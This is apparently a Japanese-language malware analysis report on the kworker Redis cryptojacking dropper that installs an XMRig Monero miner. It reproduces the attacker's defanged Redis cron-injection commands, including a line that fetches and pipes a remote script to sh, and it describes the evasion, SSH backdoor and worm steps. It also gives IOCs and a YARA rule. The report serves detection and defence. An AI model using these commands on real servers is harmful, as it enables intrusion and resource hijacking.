このページは翻訳版です。正式な本文は英語版です。 英語版を読む

malware · cryptomining · redis · linux · honeypot · monero · 8220-gang · xmrig · worm

Kworker: アンインストーラを自前で持ち込むクリプトマイナー

Kinryū Labs は、パスワードなしで開放された Redis ポートが約5秒で root シェルに変わる様子を、8220 系譜のクリプトジャッカーの手口として捕捉した。ドロッパーは kworker という 636 行のシェルスクリプトで、Alibaba と Tencent のクラウドセキュリティエージェントをベンダー純正のツールでアンインストールし、200 行を競合マイナーの駆除に費やし、SSH にバックドアを仕込み、偽の ps、top、pstree の陰に XMRig の Monero マイナーを隠し、さらに横展開を試みる。

著者 Davis Zheng·

TLP:CLEAR。一般公開可。Kinryū Labs のハニーポットセンサーネットワークで捕捉。以下の指標は defang 済み。

エグゼクティブサマリー

  • 約5秒開放された Redis ポートから root cron バックドア4本まで
  • 636行の bash、ホスト乗っ取り一式
  • 2本のベンダー製アンインストーラを base64 で内蔵
  • 80+キルリストに載る競合マイナー

UTC 深夜0時6分、何者かが当方のハニーポットの一つの Redis ポートへ接続し、相手が何かを確かめるために INFO を1回だけ実行して、切断した。2秒後に再接続し、作業を始めた。切断するまで合計5秒、その間にサーバの cron テーブルを4通りのやり方で書き換え、そのすべてを同一のファイル、kworker というシェルスクリプトに向けていた。

実行させることはなかった。スクリプトは一度も走っていない。手元にあるのはスクリプトそのものと、攻撃者のコマンド列である。つまり残されたのは 636 行すべてを含むスクリプト全文と、攻撃者のコマンド列の全体だ。両者を突き合わせると、コモディティ化した Linux クリプトジャッキングが 2026 年にどこまで来たかの断面がきれいに見える。kworker は良い検体だ。このジャンルがこれまでに発明したものをほぼすべてやってのける。そして一つだけ、まったく真顔でやることがある。アンチウイルスを、そのベンダー純正のアンインストーラでアンインストールするのだ。

主要な所見
  • 8220 Gang / kworkerds 系譜のコモディティ・クリプトジャッキングであり、日和見的かつ標的を選ばない(確度中)。 Redis による配送、リネームされたダウンロードツール、/etc/javae のロックファイル、巨大なキルリストはいずれもこのファミリの特徴である。確度を中に留め、それ以上に上げないのは、これが各グループの間で回し合われ転売される広くフォークされたコードであり、名前は単一の作者ではなく系譜を指すにすぎないためだ。
  • 目的は Monero のマイニングである(確度高)。 スクリプトの目的はすべて、huge pages を有効化したうえで XMRig ビルドである javae を取得して起動することにある。それ以外は場を空け、ホストを保持し続けるために存在する。
  • 使い込まれた成熟したソフトウェアであって、誰かの週末プロジェクトではない(確度高)。 侵入時の cron 行が cd1 と wd1 を呼んでいるが、これらは kworker がインストールされた後にしか存在しない。キットは自分自身の存在を前提にしており、これはしばらく流通してきたコードの印である。
  • ウォレットが欠けているのは意図的である(確度高)。 スクリプトは Monero アドレスもプールも保持していない。どちらもマイナーバイナリ側にあり、当方はそれを回収していない。このグループのキャンペーン群を結びつける唯一の手がかりが、まさに彼らがスクリプトから外している部分だ。RedTail で突き当たったのと同じ壁である。

FLUSHALL、そして cron への4つの経路

パスワードなしでインターネットに開放された Redis は、何年も前から1行で取れる root シェルであり、ここでの手口も昔ながらの鉄板だ。値が cron ジョブであるデータベースキーを設定する。Redis にデータベースを cron フォルダへ保存させる。SAVE を呼ぶ。Redis は偽の cron ジョブを含むデータベースをディスクへ書き、1分後に cron がそれを root で実行する。訪問者はサーバをフィンガープリントし、ファイルを書けることを確認し、保存失敗時の安全装置を切ってから、この手口を実行した。

# what the visitor sent to Redis (abbreviated, defanged)
SET backup1 "*/2 * * * * cd1 -fsSL hxxps://download.logltech[.]workers[.]dev/up/down/api/kworker | sh"
CONFIG SET dir /var/spool/cron/
CONFIG SET dbfilename root
SAVE

侵入の全体はわずか数秒に収まる。

  • 00:06:00 UTC接続し、サーバをフィンガープリントするために INFO を1回だけ送り、切断。
  • +2秒再接続。それぞれ cron 行を保持する4つのキーを設定。CONFIG SET dir で cron フォルダを指定し、CONFIG SET dbfilename で対象の cron ファイルを指定、stop-writes-on-bgsave-error を無効化して SAVE。
  • +合計5秒切断。cron バックドアを4本設置、すべて `kworker` を指している。
  • +1分実在のホストであれば、cron が設置された行を root で実行し、kworker を取得する。

立ち止まって見る価値があるのは冗長性だ。cron ジョブを1つ書いたのではなく、同じ命令を4箇所、/var/spool/cron/root、/var/spool/cron/crontabs、/etc/cron.d/javae、/etc/crontab に書き込み、Red Hat 系と Debian 系の両方のレイアウト、両方の cron 構文をカバーしている。各行は cd1、wget、curl、wd1 と異なるツールで kworker を取得し、2分、3分、4分、5分とずらしたスケジュールになっている。このうち2つの名前は実在するプログラムではない。cd1 と wd1 は、kworker がインストールされた後に curl と wget をリネームした名前だ。侵入の時点で、これから落としてくるスクリプトの存在がすでに前提になっている。キット全体が内部的に一貫しており、これが使い込まれた成熟したソフトウェアであって誰かの週末プロジェクトではないと分かる理由である。

アンインストーラは自前で持参

root を取った瞬間から、kworker は建物の解体にかかる。ファイアウォールをフラッシュし、ufw を停止、SELinux を permissive に落としたうえで設定ファイル上でも無効化、AppArmor を停止、カーネルの NMI ウォッチドッグをオフにする。最後のものが効いてくるのは、マイナーが CPU を何週間も 100 パーセントに張り付かせるからで、ウォッチドッグはそれに気付き得る数少ない仕組みの一つだからだ。/var/log/syslog は完全に削除される。

次にクラウドセキュリティエージェントを探しに行く。ここからスクリプトは普通ではなくなる。中国の大手クラウド事業者は VM にホストエージェントを載せている。Alibaba の Aegis は AliYunDun として動いているのを見かける。Tencent は YunJing、Huawei は HostGuard だ。kworker はそれぞれを確認する。Alibaba のものを見つけると、単にプロセスを殺すのではない。Alibaba の公式アンインストーラを実行する。しかも Alibaba への経路がないマシンでもそれが機能するように、Alibaba のアンインストールスクリプト2本を base64 エンコードして自身の中に抱えている。当方は両方をデコードした。本物だった。kprobe トレースの後始末まで含めて。

エンドポイント保護をベンダーの意図した手順どおりきれいに取り除き、ログも整えて去る。

これは即興ではない。誰かが実際の Aliyun のマシンの前に座り、アンインストーラを抜き出し、組み込んだのだ。

bash で書かれた縄張り争い

この種のスクリプトを読んだことがなければ、驚くのはその大部分が他の犯罪者に向けられていることだろう。マイナーにとっての真の敵はシステム管理者ではなく、同じ CPU を借りようとする次のマイナーである。kworker はおよそ 200 行を競合の捜索に費やし、掴めるかぎりのあらゆる手がかりで殺しにかかる。

  • プロセス名で、100 を超えるブロックリストから。xmrig、kinsing、kdevtmpfsi、watchdogs と watchbog のファミリ、ddg、sustes、そして自身の名前の由来である古い kworkerds。
  • ポートで、マイニングプールや IRC ボットが使うもの。
  • ハードコードされた IP アドレスで。
  • CPU で、これは鈍器だ。 認識できない名前でプロセッサの 40 パーセント以上を消費しているものはすべて殺す。CPU を食っている未知のプロセスは定義上ライバルのマイナーである、という理屈だ。

/tmp と /dev/shm から相手のファイルを削除し、cron ジョブを剥ぎ取り、一部が仕込む preload 型ルートキットを除去し、Docker にも手を伸ばして既知のマイニングイメージを停止・削除する。これは RedTail の clean スクリプト や Rootpacket の killservice.sh で記録したのと同じ土地の奪い合いだ。これらのグループはいずれも同じ設定ミスのマシンを取り合っており、いずれも場の掃討から始める。

また、とりわけ執拗に TeamTNT に対して無礼である。TeamTNT が行う curl と wget のリネームを元に戻し、そのディレクトリを消去する。Kinsing を殺した箇所では、ファイルを fuckyou という文字列で上書きしたうえでロックし、Kinsing が自分を復元できないようにする。ここに仁義はなく、あるのは土地の奪い合いだけで、kworker はそれを大半の連中より手荒くやる。

リストを丁寧に読むと、競合がどう隠れているかのカタログになる。ある一群はカーネルスレッドを装う。kacpi_svc、kswap_svc、kthreadd_svc、ksoftirqd_svc。別の一群はシステムデーモンを装う。polkitd、acpid、dbus-daemon--system、そして L であるべき箇所が大文字の I になっている systemctI。kworker はライバルが着ている変装そのものを狩っており、それは数行あとで javae を systemd-network や irqbalanced といった名前に紛れ込ませるときに自分が手に取る変装と同じものだ。この争いの参加者は全員が退屈なシステムノイズの格好をしており、全員が互いの衣装を暗記している。

いくつかの標的はそもそも名前ですらない。その一つ L2Jpbi9iYXN は、/bin/bash コマンドの base64 先頭部分である。kworker はこのエンコード済みプレフィックスでプロセステーブルを grep し、コマンドラインに base64 の塊を抱えたライバルのローダーを捕まえる。

リスト全体はかなり長く、殺したいプロセスを名指しする方法が 100 通り以上ある。この確執の手触りを知るだけでも一度ざっと眺める価値がある。

捕捉したスクリプトから抜き出したキルリスト全文

kill_miner_proc、kill_sus_proc、および Docker の掃討部分から抜粋。ここに挙がるものはすべて kworker が狩る標的であり、自身のインフラではない。IP は defang 済み。

任意のプロセスを殺すポート(マイニングプール、IRC ボット、RAT、代替 SSH と Telnet): 23、143、2222、3333、3347、3389、5555、6665、6666、6667、7777、8444、10008、13531。

識別可能なマイナーおよびボットネットファミリ: xmrig、xmrig-cpu、xmrig-notls、xmr-stak、mstxmr、cnrig、minerd、minergate、cryptonight、crypto-pool、moneroocean、kinsing、kdevtmpfsi、kworkerds、kworker34、watchdogs、watchd0g、watchbog、ddg、ddg.2011、sustes、sustse、sustse3、kthrotlds、ksoftirqds、tntrecht(TeamTNT)、nanoWatch、sourplum、disk_genius、biosetjenkins、nullcrew。

カーネルスレッドを装うライバル: kacpi_svc、kswap_svc、kauditd_svc、kpsmoused_svc、kseriod_svc、kthreadd_svc、ksoftirqd_svc、kintegrityd_svc、kblockd_svc、native_svc。

システムデーモンを装うライバル: polkitd、acpid、dbus-daemon--system、irqbalance、irqbalanc1、crond64、nginxk、vmlinuz、systemctI(systemctl ではなく大文字の i)、systemten、systemxlv、svcupdate、netdns、netns、redis2、rsync、httpgd、haveged、voltuned、nqscheduler。

その他の名前付きペイロード、スクリプト、キャンペーン別マーカー: apaceha、apachiii、mixnerdx、mixtape、performedl、conns、mgwsl、pythno、jweri、lx26、i586、gddr、askdljlqw、ysaydh、bonns、donns、kxjd、nopxi、deamon、zigw、devtool、devtools、suppoie、exin、xr、jawa、ynn、servim、darwin、sysstats、Loopback、XJnRj、NXLAi、BI5zj、icb5o、wnTKYg、2t3ik、qW3xT.2、hahwNEdB、CnzFVPLF、CvKzzZLs、OIcJi1m、IOFoqIgyC0zmf2UR、65ccEJ7、jmxx、2Ne80nA、C4iLM4L、Guard.sh、Duck.sh、bonn.sh、conn.sh、kw.sh、pro.sh、mr.sh、2mr.sh、cr5.sh、he.sh、miner.sh、l.sh、z3.sh、lower.sh、ndt.sh、logo9.jpg、oracle.jpg、init10.cfg、init12.cfg、j2.conf、zer0day.ru、gitee.com。

難読化されたランチャーと投下される設定ファイル: ./ppp、./vsp、./jvs、./pvv、./vpp、./pces、./rspce、./jiba、./haveged、./watchbog、./servceaess とその綴り違いの双子、mwyumwdbpq.conf、honvbsasbf.conf、mqdsflm.cf、/wl.conf、wc.confz、加えて base64 クレードルのマーカー L2Jpbi9iYXN(/bin/bas... ワンライナーの先頭部分)。

見つけ次第撃つ競合のプールと C2 の IP: 45.76.122[.]92、51.38.191[.]178、51.15.56[.]161、104.248.4[.]162、89.35.39[.]78、107.174.47[.]156、107.174.47[.]181、83.220.169[.]247、51.38.203[.]146、144.217.45[.]45、176.31.6[.]16、46.243.253[.]15、200.68.17[.]196、188.209.49[.]54、181.214.87[.]241、121.42.151[.]137。

停止・削除する Docker イメージとコンテナ: コンテナ名 pocosow、gakeaws、azulu、auto、xmr、mine、slowhttp、bash.shell、イメージ参照 pocosow、gakeaws、buster-slim、hello-、azulu、registry、xmr、monero、mine、slowhttp。

そして鈍器: javae に一致しないもので CPU 40 パーセント超のものはすべて殺され、名前が角括弧付きのカーネルスレッドに見えるもので 10 パーセント超のもの、/tmp から実行されているもの、不自然に長い名前のプロセスも同様に殺される。

もう見えない

場を片付けたあとは、自分の駒を隠す。ps、top、pstree を2行のラッパーに置き換え、本物のバイナリを呼びつつマイナー(javae)や同梱のスキャナ(pnscan)に言及する行を静かに取り除く。そのうえで偽物のタイムスタンプを 2016 年に戻し、新しく見えないようにする。感染したマシンで ps を実行しても、マイナーは単に一覧に出てこない。

マイナーの名前はそもそもプロセステーブルに溶け込むよう付けられている。javae の隣には systemd-network、irqbalanced、kswaped といった名前でロックファイルが置かれ、どれも退屈なシステムノイズに読めるよう選ばれている。

鍵と、隣家への経路

乗っ取りを仕上げる手が2つある。

一つは、コメントが単に uc1 である運用者の SSH 公開鍵を root の authorized_keys に書き込み、そのファイルを immutable にすることだ。気付くだけでは足りない。削除する前に immutable ビットを外さなければならない。これはマイナーが駆除された後も生き残るハンズオンアクセスである。

もう一つは拡散の試みだ。root の known_hosts、つまりこのマシンがログインしたことのある全マシンの一覧を読み、ディスク上にすでに転がっている鍵を使ってそれぞれへ SSH を試みる。入れたマシンではワンライナーを実行し、バックアップのアドレスから kworker を取得して同じ話を最初から始めさせる。高速なワームではなく、パスワードなしの鍵が放置されていることに依存しているが、たいていそうなっている類いの環境では、それで十分だ。

マイナー、そして手に入らなかったウォレット

これだけの仕掛けがあっても、実際の稼ぎ手は退屈だ。もう一つのファイル javae、Monero を掘る XMRig ビルドである。kworker は huge pages を有効化し(vm.nr_hugepages を 128 に設定、XMRig の標準的な高速化手法)、javae を /etc に置いて実行する。

本レポートの欠落部分がここだ。当方は javae を保有しておらず、ウォレットも分からない。スクリプトは Monero アドレスもプールも持たない。どちらも実行時に取得されるマイナーバイナリに焼き込まれており、C2 はこの検体を調べた公開サンドボックスのいずれにもそれを配信しなかったため、受動的に分解できるものが存在しない。kworker 単体を解析する者は誰でも同じ壁に突き当たる。ウォレットはこのグループのキャンペーン群を結びつける唯一のものであり、まさに彼らがスクリプトから外しているものだ。

Cloudflare 上にホストされているのは意図的

スクリプトもマイナーも download.logltech[.]workers[.]dev、すなわち Cloudflare Workers のアドレスから配信されており、これは意図的な選択である。Workers は無料で、既定で HTTPS、Cloudflare のレピュテーションを借りるためドメインブロックリストをすり抜け、運用者が実際に管理しているオリジンを隠す。ペイロードの URL はすべて Cloudflare に解決され、運用者の本当のオリジンは一切露出しない。

ワームが使うバックアップチャネルは tutorial.clashverge[.]space で、2月下旬に登録されている。スクリプトにハードコードされたそれ以外の IP アドレスは、すべて殺したい競合のものであり、Vultr、OVH、DigitalOcean のマシンと杭州の Alibaba Cloud ホスト1台に散らばっていて、この運用者のものではまったくない。ハードコードされた IP はインフラではなく標的リストとして読むべきだ。

これは誰のものか

慎重にいこう。これは通常 8220 Gang、あるいは kworkerds に分類される系譜のコモディティ・クリプトジャッキングである。兆候はすべて揃っている。Redis の cron インジェクションによる配送、curl から cd1 へのリネーム、/etc/javae のロックファイル、pnscan による拡散、膨大なキルリスト。アンチウイルスエンジンは名前で一致しておらず、それ自体が要点である。ClamAV は Rocke と呼び、Rising は TeamTNT とタグ付けし、残りは単に CoinMiner と言う。これらのスクリプトは半ダースほどのグループの間でコピーされ、統合され、転売されており、kworker は自分と近縁のファミリのいくつかを殺している。

経験則

このファミリは指紋ではなく、近隣地域として扱うこと。

中国系クラウドエージェントへの注力と、VirusTotal が同じ検体に紐付けている Windows PowerShell 版の兄弟が絵を埋めていくが、安全に言えるのは控えめな結論だ。広くフォークされ、金銭目的で、標的型ではなく、新しくもない。確度は中、そこに留めておくのが妥当である。

侵害指標

ネットワーク

指標文脈
download.logltech[.]workers[.]devC2(主系)、Cloudflare Workers。/up/down/api/{kworker, javae, cb.txt} を配信
tutorial.clashverge[.]spaceC2(予備)、ワームが使用。2026年2月27日登録
170.9.225[.]197Redis ハニーポットに接続してきた送信元 IP
*.workers.dev ホスト + /up/down/api/ 配下への GET通信経路上で注視すべきペイロード取得パターン

ファイル(SHA-256 / MD5)

ファイルSHA-256MD5
kworker(ドロッパー)7420e819e6cf6d7608e475468ae0160185fe7eed0b5b4129aad3e8dabc776e30501ec2da3039ebe4ca379f663232176a
javae(XMRig マイナー)未回収、5,685,096 バイトと推定

SSH バックドア鍵: コメント uc1、公開鍵フィンガープリント SHA256:VG0G5YwuzVAQW5JrC9RukA6Pynj3AwnFhWPCKp6TfVY。環境全体の authorized_keys を対象に探索すること。

ホスト上の痕跡

パス文脈
/etc/kworker、/etc/javae、/etc/cron.d/javae、/tmp/{kworker,javae}投下されたファイル
/usr/bin/cd1(旧 curl)、/usr/bin/wd1(旧 wget)リネームされたダウンロードツール
/bin/ps.original、/bin/top.original、/bin/pstree.originalトロイの木馬化されたラッパーの背後に退避された本物のバイナリ
/usr/bin/{kswaped, pamdicks, ip6network, irqbalanced, rctlcli, systemd-network}immutable な1桁の名前ロックファイル
vm.nr_hugepages = 128XMRig 用に有効化された huge pages

挙動

  • 実体がシェルスクリプトで grep -v にパイプしている ps、top、pstree。
  • 自分で書いた覚えがなく、末尾のコメントが uc1 である authorized_keys。
  • sh /etc/kworker や sh /tmp/kworker を実行する cron ジョブ、および存在すべきでない /etc/cron.d/javae。
  • /usr/bin/kswaped とその仲間にある immutable な1桁のファイル。
  • cd1 と wd1 にリネームされた curl と wget。
  • ひそかに 128 に設定された vm.nr_hugepages。

検知

ホスト側の手がかりは、知ってさえいれば派手であり、上に列挙したとおりである。通信経路上では、*.workers.dev ホストを解決し /up/down/api/ 配下のパスを要求するものはすべて精査に値する。以下は安定した文字列で発火する YARA ルールである。検知用として、意図的に defang していない文字列を含んでいる。

rule kworker_cryptojacker_sh
{
    meta:
        description = "Linux kworker/javae cryptojacking installer (Redis XMRig dropper)"
        author      = "Kinryu Labs honeypot CTI"
        reference   = "7420e819...776e30"  // full SHA-256 in the IOC table
        tlp         = "CLEAR"

    strings:
        $c2_1  = "download.logltech.workers.dev" ascii
        $c2_2  = "tutorial.clashverge.space" ascii
        $api   = "/up/down/api/kworker" ascii
        $lock  = "/etc/javae" ascii
        $miner = "miner_size=\"5685096\"" ascii
        $ren1  = "mv /usr/bin/curl /usr/bin/cd1" ascii
        $ren2  = "mv /usr/bin/wget /usr/bin/wd1" ascii
        $bin1  = "/usr/bin/pamdicks" ascii
        $bin2  = "/usr/bin/kswaped" ascii
        $bin3  = "/usr/bin/rctlcli" ascii
        $fn1   = "kill_miner_proc" ascii
        $fn2   = "download_file_if_needed" ascii
        $hide  = "javae\\|pnscan" ascii
        $ssh   = "9p8zIVKLUHMUNC9mKqPljzxH" ascii  // fragment of the uc1 key

    condition:
        filesize < 256KB and (
            $ssh or any of ($c2_1, $c2_2) or
            ($api and $lock) or
            ($miner and 1 of ($ren1, $ren2)) or
            (2 of ($bin1, $bin2, $bin3) and 1 of ($fn1, $fn2, $hide))
        )
}

これを踏まえて変えるべきこと

ここに高度なものは何一つなく、それこそが教訓である。kworker が入り込めたのは Redis のポートがパスワードなしで開いていたからで、2018 年当時のミスが 2026 年でもまだ配当を生んでいる。その後のすべて、EDR の除去もルートキットもワームも、玄関の鍵が開いていたからこそ意味を持った。

  • Redis を、あるいはいかなるデータストアも、インターネットに晒さず、認証を必須にすること。 開いたサービスが1つあれば、単一サービスの侵害ではなくホスト全体の侵害として扱う。
  • cron と authorized_keys を本番コードと同じように監視すること。 攻撃者にとって、それはまさに本番コードだからだ。
  • マシン上のクラウドエージェントを安全網とみなさないこと。 kworker の最初の本能は、ベンダー純正のツールで、礼儀正しく、それをアンインストールしに行くことだった。

MITRE ATT&CK マッピング

戦術技術
Initial AccessT1190 Exploit Public-Facing Application (Redis)
ExecutionT1059.004 Unix Shell
PersistenceT1053.003 Cron; T1098.004 SSH Authorized Keys
Defense EvasionT1562.001 Impair Defenses: Disable or Modify Tools(クラウドエージェントと EDR のアンインストール); T1562.004 Disable or Modify System Firewall; T1070.002 Clear Linux or Mac System Logs; T1014 Rootkit(トロイの木馬化された ps/top/pstree); T1036.005 Masquerading: Match Legitimate Name; T1222.002 Linux File and Directory Permissions Modification(chattr +i); T1070.006 Timestomp(偽物のタイムスタンプ改ざん)
DiscoveryT1057 Process Discovery(競合の捜索); T1518.001 Security Software Discovery(クラウドエージェント); T1046 Network Service Scanning(pnscan)
Lateral MovementT1021.004 Remote Services: SSH; T1570 Lateral Tool Transfer
Command and ControlT1071.001 Web Protocols; T1102 Web Service (Cloudflare Workers); T1105 Ingress Tool Transfer
ImpactT1496 Resource Hijacking(Monero マイニング)

手法とアナリストの注記

  • 解析は静的かつ受動的に行った。ドロッパーは一度も実行しておらず、攻撃者のインフラに接触したこともない。所見は、捕捉した 636 行のスクリプトを全文読むこと、埋め込まれた base64 のアンインストーラをデコードすること、記録された Redis セッションを精査することから得ている。
  • 上記の指標は defang 済み。YARA ルールは検知のため、意図的に defang していない文字列を含む。
  • ステージ2のマイナー(javae)と Monero ウォレットは入手していない。スクリプトはどちらも持たず、両方とも実行時に取得されるマイナーバイナリ側にあり、C2 は公開サンドボックスにそれを配信しなかった。ウォレットの回収には通信キャプチャを伴うライブ実行が必要であり、それは実施していない。
  • 検体(ドロッパーとデコード済みのアンインストーラ)は、他の研究者や防御側に要請に応じて提供する。contact@kinryu.sh 宛に、自身が何者でどのような用途に必要かを簡潔に添えて連絡されたい。
Sample
kworker · 7420e819e6cf6d76…
How to cite
Kinryū Labs (2026). Kworker: アンインストーラを自前で持ち込むクリプトマイナー. https://kinryu.sh/ja/reports/kworker-redis-cryptojacking-dropper/